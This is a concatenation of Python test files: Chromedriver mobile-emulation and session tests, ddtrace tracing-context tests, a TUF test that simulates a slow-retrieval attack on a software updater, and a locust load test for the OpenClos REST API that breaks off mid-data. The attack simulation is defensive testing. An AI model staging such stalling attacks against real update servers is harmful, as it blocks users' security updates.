'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.SetWindowSize(600, 400)
driver.Load(self._http_server.GetUrl() + '/userAgent')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testDeviceMetricsWithDeviceWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testUserAgent(self):
driver = self.CreateDriver(
mobile_emulation = {'userAgent': 'Agent Smith'})
driver.Load(self._http_server.GetUrl() + '/userAgent')
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual("Agent Smith", body_tag.GetText())
def testDeviceName(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual(
'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleW'
'ebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/53'
'5.19',
body_tag.GetText())
def testSendKeysToElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
text = driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testHoverOverElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testClickElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
driver.TouchDown(loc['x'], loc['y'])
driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
class ChromeDriverLogTest(unittest.TestCase):
"""Tests that chromedriver produces the expected log file."""
UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability'
LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP
def testChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path)
try:
driver = chromedriver.ChromeDriver(
chromedriver_server.GetUrl(), chrome_binary=_CHROME_BINARY,
experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 })
driver.Quit()
except chromedriver.ChromeDriverException, e:
self.assertTrue(self.LOG_MESSAGE in e.message)
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertTrue(self.LOG_MESSAGE in f.read())
class PerformanceLoggerTest(ChromeDriverBaseTest):
"""Tests chromedriver tracing support and Inspector event collection."""
def testPerformanceLogger(self):
driver = self.CreateDriver(
experimental_options={'perfLoggingPrefs': {
'enableTimeline': True,
'traceCategories': 'webkit.console,blink.console'
}}, performance_log_level='ALL')
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
# Mark the timeline; later we will verify the marks appear in the trace.
driver.ExecuteScript('console.time("foobar")')
driver.ExecuteScript('console.timeEnd("foobar")')
logs = driver.GetLog('performance')
driver.Quit()
marked_timeline_events = []
seen_log_domains = {}
for entry in logs:
devtools_message = json.loads(entry['message'])['message']
method = devtools_message['method']
domain = method[:method.find('.')]
seen_log_domains[domain] = True
if method != 'Tracing.dataCollected':
continue
self.assertTrue('params' in devtools_message)
self.assertTrue(isinstance(devtools_message['params'], dict))
cat = devtools_message['params'].get('cat', '')
# Depending on Chrome version, the events may occur for the webkit.console
# or blink.console category. They will only occur for one of them.
if (cat == 'blink.console' or cat == 'webkit.console'):
self.assertTrue(devtools_message['params']['name'] == 'foobar')
marked_timeline_events.append(devtools_message)
self.assertEquals(2, len(marked_timeline_events))
self.assertEquals({'Network', 'Page', 'Timeline', 'Tracing'},
set(seen_log_domains.keys()))
class SessionHandlingTest(ChromeDriverBaseTest):
"""Tests for session operations."""
def testQuitASessionMoreThanOnce(self):
driver = self.CreateDriver()
driver.Quit()
driver.Quit()
def testGetSessions(self):
driver = self.CreateDriver()
response = driver.GetSessions()
self.assertEqual(1, len(response))
driver2 = self.CreateDriver()
response = driver2.GetSessions()
self.assertEqual(2, len(response))
class RemoteBrowserTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver remote browser capability."""
def setUp(self):
self.assertTrue(_CHROME_BINARY is not None,
'must supply a chrome binary arg')
def testConnectToRemoteBrowser(self):
port = self.FindFreePort()
temp_dir = util.MakeTempDir()
process = subprocess.Popen([_CHROME_BINARY,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir])
if process is None:
raise RuntimeError('Chrome could not be started with debugging port')
try:
driver = self.CreateDriver(debugger_address='127.0.0.1:%d' % port)
driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
finally:
process.terminate()
def FindFreePort(self):
for port in range(10000, 10100):
try:
socket.create_connection(('127.0.0.1', port), 0.2).close()
except socket.error:
return port
raise RuntimeError('Cannot find open port')
class PerfTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver perf."""
def setUp(self):
self.assertTrue(_REFERENCE_CHROMEDRIVER is not None,
'must supply a reference-chromedriver arg')
def _RunDriverPerfTest(self, name, test_func):
"""Runs a perf test comparing a reference and new ChromeDriver server.
Args:
name: The name of the perf test.
test_func: Called with the server url to perform the test action. Must
return the time elapsed.
"""
class Results(object):
ref = []
new = []
ref_server = server.Server(_REFERENCE_CHROMEDRIVER)
results = Results()
result_url_pairs = zip([results.new, results.ref],
[_CHROMEDRIVER_SERVER_URL, ref_server.GetUrl()])
for iteration in range(30):
for result, url in result_url_pairs:
result += [test_func(url)]
# Reverse the order for the next run.
result_url_pairs = result_url_pairs[::-1]
def PrintResult(build, result):
mean = sum(result) / len(result)
avg_dev = sum([abs(sample - mean) for sample in result]) / len(result)
print 'perf result', build, name, mean, avg_dev, result
util.AddBuildStepText('%s %s: %.3f+-%.3f' % (
build, name, mean, avg_dev))
# Discard first result, which may be off due to cold start.
PrintResult('new', results.new[1:])
PrintResult('ref', results.ref[1:])
def testSessionStartTime(self):
def Run(url):
start = time.time()
driver = self.CreateDriver(url)
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('session start', Run)
def testSessionStopTime(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.Quit()
end = time.time()
return end - start
self._RunDriverPerfTest('session stop', Run)
def testColdExecuteScript(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.ExecuteScript('return 1')
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('cold exe js', Run)
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option(
'', '--chromedriver',
help='Path to chromedriver server (REQUIRED!)')
parser.add_option(
'', '--log-path',
help='Output verbose server logs to this file')
parser.add_option(
'', '--reference-chromedriver',
help='Path to the reference chromedriver server')
parser.add_option(
'', '--chrome', help='Path to a build of the chrome binary')
parser.add_option(
'', '--chrome-version', default='HEAD',
help='Version of chrome. Default is \'HEAD\'.')
parser.add_option(
'', '--filter', type='string', default='*',
help=('Filter for specifying what tests to run, "*" will run all. E.g., '
'*testStartStop'))
parser.add_option(
'', '--android-package',
help=('Android package key. Possible values: ' +
str(_ANDROID_NEGATIVE_FILTER.keys())))
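  # An illustrative invocation of this script (paths are placeholders; only
  # --chromedriver is required, as enforced below):
  #   python <this_script>.py --chromedriver=/path/to/chromedriver \
  #       --chrome=/path/to/chrome --filter=*testClickElement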
options, args = parser.parse_args()
options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver)
if not options.chromedriver or not os.path.exists(options.chromedriver):
    parser.error('chromedriver is required or the given path is invalid. ' +
'Please run "%s --help" for help' % __file__)
global _CHROMEDRIVER_BINARY
_CHROMEDRIVER_BINARY = options.chromedriver
if (options.android_package and
options.android_package not in _ANDROID_NEGATIVE_FILTER):
parser.error('Invalid --android-package')
chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path)
global _CHROMEDRIVER_SERVER_URL
_CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl()
global _REFERENCE_CHROMEDRIVER
_REFERENCE_CHROMEDRIVER = util.GetAbsolutePathOfUserPath(
options.reference_chromedriver)
global _CHROME_BINARY
if options.chrome:
_CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome)
else:
_CHROME_BINARY = None
global _ANDROID_PACKAGE_KEY
_ANDROID_PACKAGE_KEY = options.android_package
if options.filter == '*':
if _ANDROID_PACKAGE_KEY:
negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY]
else:
negative_filter = _GetDesktopNegativeFilter(options.chrome_version)
options.filter = '*-' + ':__main__.'.join([''] + negative_filter)
all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule(
sys.modules[__name__])
tests = unittest_util.FilterTestSuite(all_tests_suite, options.filter)
ChromeDriverTest.GlobalSetUp()
MobileEmulationCapabilityTest.GlobalSetUp()
result = unittest.TextTestRunner(stream=sys.stdout, verbosity=2).run(tests)
ChromeDriverTest.GlobalTearDown()
MobileEmulationCapabilityTest.GlobalTearDown()
sys.exit(len(result.failures) + len(result.errors))
|
test_context.py
|
import mock
import threading
from unittest import TestCase
from nose.tools import eq_, ok_
from tests.test_tracer import get_dummy_tracer
from ddtrace.span import Span
from ddtrace.context import Context, ThreadLocalContext
from ddtrace.ext.priority import USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP
class TestTracingContext(TestCase):
"""
Tests related to the ``Context`` class that hosts the trace for the
current execution flow.
"""
def test_add_span(self):
# it should add multiple spans
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
eq_('fake_span', ctx._trace[0].name)
eq_(ctx, span.context)
def test_context_sampled(self):
# a context is sampled if the spans are sampled
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ok_(ctx._sampled is True)
ok_(ctx.sampling_priority is None)
def test_context_priority(self):
# a context is sampled if the spans are sampled
ctx = Context()
for priority in [USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP, None, 999]:
ctx.sampling_priority = priority
span = Span(tracer=None, name=('fake_span_%s' % repr(priority)))
ctx.add_span(span)
# It's "normal" to have sampled be true even when priority sampling is
        # set to 0 or -1. It would stay false even with priority set to 2.
# The only criteria to send (or not) the spans to the agent should be
# this "sampled" attribute, as it's tightly related to the trace weight.
ok_(ctx._sampled is True, 'priority has no impact on sampled status')
eq_(priority, ctx.sampling_priority)
def test_current_span(self):
# it should return the current active span
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(span, ctx.get_current_span())
def test_close_span(self):
# it should keep track of closed spans, moving
        # the currently active span to its parent
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
eq_(1, ctx._finished_spans)
ok_(ctx.get_current_span() is None)
def test_get_trace(self):
# it should return the internal trace structure
# if the context is finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
trace, sampled = ctx.get()
eq_(1, len(trace))
eq_(span, trace[0])
ok_(sampled is True)
# the context should be empty
eq_(0, len(ctx._trace))
eq_(0, ctx._finished_spans)
ok_(ctx._current_span is None)
ok_(ctx._sampled is True)
def test_get_trace_empty(self):
# it should return None if the Context is not finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
trace, sampled = ctx.get()
ok_(trace is None)
ok_(sampled is None)
def test_finished(self):
# a Context is finished if all spans inside are finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
ok_(ctx.is_finished())
def test_finished_empty(self):
# a Context is not finished if it's empty
ctx = Context()
ok_(ctx.is_finished() is False)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans(self, log):
# when the root parent is finished, notify if there are spans still pending
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
unfinished_spans_log = log.call_args_list[-3][0][2]
child_1_log = log.call_args_list[-2][0][1]
child_2_log = log.call_args_list[-1][0][1]
eq_(2, unfinished_spans_log)
ok_('name child_1' in child_1_log)
ok_('name child_2' in child_2_log)
ok_('duration 0.000000s' in child_1_log)
ok_('duration 0.000000s' in child_2_log)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_disabled(self, log):
# the trace finished status logging is disabled
tracer = get_dummy_tracer()
tracer.debug_logging = False
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_when_ok(self, log):
# if the unfinished spans logging is enabled but the trace is finished, don't log anything
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
# close the trace
child.finish()
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
def test_thread_safe(self):
# the Context must be thread-safe
ctx = Context()
def _fill_ctx():
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
eq_(100, len(ctx._trace))
def test_clone(self):
ctx = Context()
ctx.sampling_priority = 2
# manually create a root-child trace
root = Span(tracer=None, name='root')
child = Span(tracer=None, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
cloned_ctx = ctx.clone()
eq_(cloned_ctx._parent_trace_id, ctx._parent_trace_id)
eq_(cloned_ctx._parent_span_id, ctx._parent_span_id)
eq_(cloned_ctx._sampled, ctx._sampled)
eq_(cloned_ctx._sampling_priority, ctx._sampling_priority)
eq_(cloned_ctx._current_span, ctx._current_span)
eq_(cloned_ctx._trace, [])
eq_(cloned_ctx._finished_spans, 0)
class TestThreadContext(TestCase):
"""
Ensures that a ``ThreadLocalContext`` makes the Context
local to each thread.
"""
def test_get_or_create(self):
        # asking for the Context multiple times should always
        # return the same instance
l_ctx = ThreadLocalContext()
eq_(l_ctx.get(), l_ctx.get())
def test_set_context(self):
# the Context can be set in the current Thread
ctx = Context()
local = ThreadLocalContext()
ok_(local.get() is not ctx)
local.set(ctx)
ok_(local.get() is ctx)
def test_multiple_threads_multiple_context(self):
        # each thread should have its own Context
l_ctx = ThreadLocalContext()
def _fill_ctx():
ctx = l_ctx.get()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
# the main instance should have an empty Context
# because it has not been used in this thread
ctx = l_ctx.get()
eq_(0, len(ctx._trace))
|
test_slow_retrieval_attack.py
|
#!/usr/bin/env python
"""
<Program Name>
test_slow_retrieval_attack.py
<Author>
Konstantin Andrianov
<Started>
March 13, 2012
<Copyright>
See LICENSE for licensing information.
<Purpose>
  Simulate a slow retrieval attack: a simple client update vs. a client
  update implementing TUF.
  During a slow retrieval attack, the attacker is able to prevent clients from
being aware of interference with receiving updates by responding to client
requests so slowly that automated updates never complete.
NOTE: The interposition provided by 'tuf.interposition' is used to intercept
  all calls made by urllib/urllib2 to certain network locations specified in
the interposition configuration file. Look up interposition.py for more
information and illustration of a sample contents of the interposition
configuration file. Interposition was meant to make TUF integration with an
existing software updater an easy process. This allows for more flexibility
to the existing software updater. However, if you are planning to solely use
TUF there should be no need for interposition, all necessary calls will be
generated from within TUF.
There is no difference between 'updates' and 'target' files.
"""
# Help with Python 3 compatibility, where the print statement is a function, an
# implicit relative import is invalid, and the '/' operator performs true
# division. Example: print 'hello world' raises a 'SyntaxError' exception.
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from multiprocessing import Process
import os
import random
import subprocess
import sys
import time
import tuf
import urllib
import tuf.interposition
import tuf.tests.util_test_tools as util_test_tools
class SlowRetrievalAttackAlert(Exception):
pass
def _download(url, filename, using_tuf=False):
if using_tuf:
try:
tuf.interposition.urllib_tuf.urlretrieve(url, filename)
except tuf.NoWorkingMirrorError, exception:
slow_retrieval = False
for mirror_url, mirror_error in exception.mirror_errors.iteritems():
if isinstance(mirror_error, tuf.SlowRetrievalError):
slow_retrieval = True
break
# We must fail due to a slow retrieval error; otherwise we will exit with
# a "successful termination" exit status to indicate that slow retrieval
# detection failed.
if slow_retrieval:
print('TUF stopped the update because it detected slow retrieval.')
sys.exit(-1)
else:
print('TUF stopped the update due to something other than slow retrieval.')
sys.exit(0)
else:
urllib.urlretrieve(url, filename)
def test_slow_retrieval_attack(using_tuf=False, mode=None):
WAIT_TIME = 60 # Number of seconds to wait until download completes.
ERROR_MSG = 'Slow retrieval attack succeeded (using_tuf: '+str(using_tuf)+', mode: '+\
str(mode)+').'
# Launch the server.
port = random.randint(30000, 45000)
command = ['python', 'slow_retrieval_server.py', str(port), mode]
server_process = subprocess.Popen(command, stderr=subprocess.PIPE)
time.sleep(1)
try:
# Setup.
root_repo, url, server_proc, keyids = \
util_test_tools.init_repo(using_tuf, port=port)
reg_repo = os.path.join(root_repo, 'reg_repo')
downloads = os.path.join(root_repo, 'downloads')
# Add file to 'repo' directory: {root_repo}
filepath = util_test_tools.add_file_to_repository(reg_repo, 'A'*30)
file_basename = os.path.basename(filepath)
url_to_file = url+'reg_repo/'+file_basename
downloaded_file = os.path.join(downloads, file_basename)
if using_tuf:
tuf_repo = os.path.join(root_repo, 'tuf_repo')
# Update TUF metadata before attacker modifies anything.
util_test_tools.tuf_refresh_repo(root_repo, keyids)
# Modify the url. Remember that the interposition will intercept
# urls that have 'localhost:9999' hostname, which was specified in
# the json interposition configuration file. Look for 'hostname'
# in 'util_test_tools.py'. Further, the 'file_basename' is the target
# path relative to 'targets_dir'.
url_to_file = 'http://localhost:9999/'+file_basename
# Client tries to download.
# NOTE: if TUF is enabled the metadata files will be downloaded first.
proc = Process(target=_download, args=(url_to_file, downloaded_file, using_tuf))
proc.start()
proc.join(WAIT_TIME)
    # If the download process is still running (no exit code yet) or exited
    # successfully (exit code 0), slow retrieval was not detected and the
    # attack succeeded, so we fail.
if not proc.exitcode:
proc.terminate()
raise SlowRetrievalAttackAlert(ERROR_MSG)
finally:
server_process.kill()
util_test_tools.cleanup(root_repo, server_proc)
# Simulates two kinds of slow retrieval attacks.
# mode_1: When the download begins, the server blocks the download
# for a long time by doing nothing before it sends the first byte of data.
# mode_2: During the download process, the server blocks the download
# by sending just several characters every few seconds.
try:
test_slow_retrieval_attack(using_tuf=False, mode = "mode_1")
except SlowRetrievalAttackAlert, error:
print(error)
print()
try:
test_slow_retrieval_attack(using_tuf=False, mode = "mode_2")
except SlowRetrievalAttackAlert, error:
print(error)
print()
try:
test_slow_retrieval_attack(using_tuf=True, mode = "mode_1")
except SlowRetrievalAttackAlert, error:
print(error)
print()
try:
test_slow_retrieval_attack(using_tuf=True, mode = "mode_2")
except SlowRetrievalAttackAlert, error:
print(error)
print()
|
stressRest.py
|
'''
Created on Jan 5, 2015
@author: moloyc
Before running this test, install locust: 'pip install locustio'
Running the test:
1. locust -f stressRest.py
2. Open browser http://localhost:8089/
3. Start stress test
4. Once done, download the csv file and save as locust.csv in this directory
5. python postProcess.py
6. The result is in 'out.csv'
'''
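# A condensed sketch of the workflow listed above (file names such as locust.csv,
# postProcess.py and out.csv are taken from the steps in the docstring):
#   $ pip install locustio
#   $ locust -f stressRest.py   # then open http://localhost:8089/ and start the test
#   $ python postProcess.py     # after saving the downloaded stats as locust.csv
#   # the aggregated result ends up in out.csv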
from jnpr.openclos.propLoader import loadLoggingConfig
from locust import HttpLocust, TaskSet, task
import json
import random
import time
import logging
moduleName = 'stressRest'
def getFabricPostBody():
fabric = random.choice(ipFabrics)
fabric['ipFabric']['name'] = 'fabric-'+str(time.time())
return fabric
class MyTaskSet(TaskSet):
def on_start(self):
loadLoggingConfig(appName = moduleName)
self.logger = logging.getLogger(moduleName)
        self.fabricCount = 0
        self.fabricIds = []  # populated by getIpFabrics(); read by the other tasks
'''
restServer = RestServer()
restServer.host = 'localhost'
restServer.port = 9090
restServer.initRest()
t = threading.Thread(target=restServer.start)
t.daemon = True
t.start()
'''
@task(10)
def getIpFabrics(self):
response = self.client.get('/openclos/ip-fabrics')
if response._content is not None:
jsonContent = json.loads(response._content)
self.fabricIds = [f['id'] for f in jsonContent['ipFabrics']['ipFabric']]
#self.logger.info(self.fabricIds)
@task(10)
def getIpFabric(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
#self.logger.info('GET /openclos/ip-fabrics/%s' % (id))
self.client.get('/openclos/ip-fabrics/%s' % (id))
@task(5)
def createCabling(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
self.client.put('/openclos/ip-fabrics/%s/cabling-plan' % (id))
@task(5)
def createConfigs(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
self.client.put('/openclos/ip-fabrics/%s/device-configuration' % (id))
@task(10)
def getDevices(self):
if self.fabricIds:
id = random.choice(self.fabricIds)
response = self.client.get('/openclos/ip-fabrics/%s/devices' % (id))
#self.logger.info("RESPONSE: " + str(response.status_code) + ' ' + response.reason)
@task(2)
def createIpFabric(self):
if self.fabricCount > 10:
return
self.fabricCount += 1
kwargs = {}
kwargs['headers'] = {'Content-Type':'application/json'}
response = self.client.post('/openclos/ip-fabrics', json.dumps(getFabricPostBody()), **kwargs)
#self.logger.info("RESPONSE: " + str(response.status_code) + ' ' + response.reason)
@task(1)
def getConf(self):
self.client.get('/openclos/conf')
ipFabrics = [
{"ipFabric": {
"name": "name",
"spineDeviceType": "qfx5100-24q-2p",
"spineCount": 2,
"spineAS": 5,
"leafSettings": [{"deviceType": "ex4300-24p"},{"deviceType": "qfx5100-48s-6q"}],
"leafCount": 6,
"leafAS": 10,
"topologyType": "threeStage",
"loopbackPrefix": "12.1.1.1/21",
"vlanPrefix": "15.1.1.1/20",
"interConnectPrefix": "14.1.1.1/21",
"outOfBandAddressList": "10.204.244.95",
"managementPrefix": "192.168.2.1/24",
"description": "test",
"hostOrVmCountPerLeaf": 254,
"devicePassword": "password",
"outOfBandGateway": "192.168.2.1",
"devices": [
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-01", "username": "root", "password": "password", "deployStatus": "deploy"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-02"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-01", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-02", "deployStatus": "deploy"},
{"role": "leaf", "name": "test-leaf-03"},
{"role": "leaf", "name": "test-leaf-04"},
{"role": "leaf", "name": "test-leaf-05"},
{"role": "leaf", "name": "test-leaf-06"}
]
}},
{"ipFabric": {
"name": "name",
"spineDeviceType": "qfx5100-24q-2p",
"spineCount": 4,
"spineAS": 5,
"leafSettings": [{"deviceType": "ex4300-24p"},{"deviceType": "qfx5100-48s-6q"}],
"leafCount": 10,
"leafAS": 10,
"topologyType": "threeStage",
"loopbackPrefix": "12.1.1.1/21",
"vlanPrefix": "15.1.1.1/20",
"interConnectPrefix": "14.1.1.1/21",
"outOfBandAddressList": "10.204.244.95",
"managementPrefix": "192.168.2.1/24",
"description": "test",
"hostOrVmCountPerLeaf": 254,
"devicePassword": "password",
"outOfBandGateway": "192.168.2.1",
"devices": [
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-01", "username": "root", "password": "password", "deployStatus": "deploy"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-02"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-03"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-04"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-01", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-02", "deployStatus": "deploy"},
{"role": "leaf", "name": "test-leaf-03"},
{"role": "leaf", "name": "test-leaf-04"},
{"role": "leaf", "name": "test-leaf-05"},
{"role": "leaf", "name": "test-leaf-06"},
{"role": "leaf", "name": "test-leaf-07"},
{"role": "leaf", "name": "test-leaf-08"},
{"role": "leaf", "name": "test-leaf-09"},
{"role": "leaf", "name": "test-leaf-10"}
]
}},
{"ipFabric": {
"name": "name",
"spineDeviceType": "qfx5100-24q-2p",
"spineCount": 8,
"spineAS": 5,
"leafSettings": [{"deviceType": "ex4300-24p"},{"deviceType": "qfx5100-48s-6q"}],
"leafCount": 20,
"leafAS": 10,
"topologyType": "threeStage",
"loopbackPrefix": "12.1.1.1/21",
"vlanPrefix": "15.1.1.1/16",
"interConnectPrefix": "14.1.1.1/21",
"outOfBandAddressList": "10.204.244.95",
"managementPrefix": "192.168.2.1/24",
"description": "test",
"hostOrVmCountPerLeaf": 254,
"devicePassword": "password",
"outOfBandGateway": "192.168.2.1",
"devices": [
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-01", "username": "root", "password": "password", "deployStatus": "deploy"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-02"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-03"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-04"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-05"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-06"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-07"},
{"role": "spine", "family": "qfx5100-24q-2p", "name": "test-spine-08"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-01", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-02", "deployStatus": "deploy"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-03"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-04"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-05"},
{"role": "leaf", "family": "qfx5100-48s-6q", "name": "test-leaf-06"},
{"role": "leaf", "name": "test-leaf-07"},
{"role": "leaf", "name": "test-leaf-08"},
{"role": "leaf", "name": "test-leaf-09"},
{"role": "leaf", "name": "test-leaf-10"},
{"role": "leaf", "name": "test-leaf-11"},
